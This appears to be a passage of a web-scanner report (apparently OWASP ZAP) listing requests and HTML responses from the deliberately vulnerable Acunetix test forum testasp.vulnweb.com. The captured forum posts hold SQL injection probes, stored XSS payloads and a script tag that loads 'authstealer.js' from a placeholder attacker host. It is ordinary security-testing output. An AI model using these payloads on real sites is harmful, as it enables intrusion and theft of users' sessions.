Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:23 GMT Content-Length: 3101 |
| Response Body - size: 3,101 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Weather</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D1" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D1" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> Weather </div> <table width="100%" border="0" cellspacing="0" cellpadding="5"> <tr> <td class="tableheader">Thread</td> <td class="tableheader">Posts</td> <td class="tableheader">Posted by</td> <td class="tableheader">Last Post</td> </tr> <tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=0'>301 Moved Permanently</a></div></td><td>1</td><td>WinstonVup</td><td>3/14/2022 5:30:18 AM</td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;left:10%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showforum.asp?id=2 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 316 bytes. |
GET http://testasp.vulnweb.com/showforum.asp?id=2 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:23 GMT Content-Length: 4017 |
| Response Body - size: 4,017 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Miscellaneous</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D2" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D2" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> Miscellaneous </div> <table width="100%" border="0" cellspacing="0" cellpadding="5"> <tr> <td class="tableheader">Thread</td> <td class="tableheader">Posts</td> <td class="tableheader">Posted by</td> <td class="tableheader">Last Post</td> </tr> <tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=0'>ÑайÑ</a></div></td><td>1</td><td>Jamesaidem</td><td>3/13/2022 10:17:25 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=1'>Testing</a></div></td><td>1</td><td> </td><td>3/13/2022 3:11:02 PM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=2'><script>doSomethingEvil();</script></a></div></td><td>1</td><td> </td><td>3/13/2022 3:31:45 PM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=3'><script src=http://hackersite.com/authstealer.js> </script>.</a></div></td><td>1</td><td> </td><td>3/13/2022 3:33:39 PM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=4'><script>alert('Hello')</script></a></div></td><td>1</td><td> </td><td>3/13/2022 3:34:05 PM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=5'><script>alert('BELLO')</script></a></div></td><td>1</td><td> </td><td>3/13/2022 3:34:42 PM</td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;left:10%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=0 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 336 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=0 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 178 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:25 GMT Content-Length: 14602 |
| Response Body - size: 14,602 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D0" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:27 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>'";'()(NULL</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:27 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>'";'()(NULL</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:27 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>'";'()(NULL</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:28 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> AND 1=1 -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:28 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' AND '1'='1' -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:28 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" AND "1"="1" -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:28 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> AND 1=1</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:28 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' AND '1'='1</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:29 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" AND "1"="1</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:29 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>%</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:29 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>%' -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:29 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>%" -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:29 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> OR 1=1 -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:29 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> AND 1=2 -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:30 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' OR '1'='1' -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:30 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' AND '1'='2' -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:30 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" OR "1"="1" -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:30 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" AND "1"="2" -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:30 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> OR 1=1</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:30 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> AND 1=2</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:31 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' OR '1'='1</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:31 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' AND '1'='2</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:31 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" OR "1"="1</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:31 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" AND "1"="2</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:31 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> UNION ALL select NULL -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:32 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' UNION ALL select NULL -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:32 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" UNION ALL select NULL -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:32 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>) UNION ALL select NULL -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:32 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>') UNION ALL select NULL -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:33 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>") UNION ALL select NULL -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:33 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> ASC -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:13:44 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>o3lppoLN</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/0'><br>posted by <b> </b> on 3/13/2022 12:05:24 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Call me maybe<script>alert('Beautiful in white)</script> - 202.187.185.168</div><div class='posttext'>HI Maybe<br /></div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/0'><br>posted by <b> </b> on 3/13/2022 12:06:11 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Call me maybe<script>alert('Beautiful in white')</script> - 202.187.185.168</div><div class='posttext'>HI Maybe<br /></div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/0'><br>posted by <b> </b> on 3/13/2022 12:51:58 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Message 1 <script>alert('Hello')</script> - 180.75.245.68</div><div class='posttext'>HELLO<br /></div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>hanxuan</b> on 3/13/2022 2:43:15 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>hi - 180.75.236.90</div><div class='posttext'>http://example.com/han.js<br />document.write("I'm coming");</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=1 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 336 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=1 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:25 GMT Content-Length: 5979 |
| Response Body - size: 5,979 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D1" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:27 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>'";'()(NULL</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/0'><br>posted by <b> </b> on 3/13/2022 3:12:27 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Message 1 - 180.74.64.218</div><div class='posttext'><script>alert('Hello')</script><br /></div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/0'><br>posted by <b> </b> on 3/13/2022 3:12:55 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Message 1 - 180.74.64.218</div><div class='posttext'>Message 1<script>alert('Hello')</script></div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/0'><br>posted by <b> </b> on 3/13/2022 3:13:08 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>111 - 180.74.64.218</div><div class='posttext'>Message 1<script>alert('Hello')</script></div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/0'><br>posted by <b> </b> on 3/13/2022 3:13:31 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>123 - 180.74.64.218</div><div class='posttext'><script>alert('Hello')</script></div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/0'><br>posted by <b> </b> on 3/13/2022 3:13:41 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>123 - 180.74.64.218</div><div class='posttext'><script>alert('Hello')</script></div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/0'><br>posted by <b> </b> on 3/13/2022 3:13:51 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Message 1<script>alert('Hello')</script> - 180.74.64.218</div><div class='posttext'>1232</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=10 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=10 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:26 GMT Content-Length: 4130 |
| Response Body - size: 4,130 bytes. |
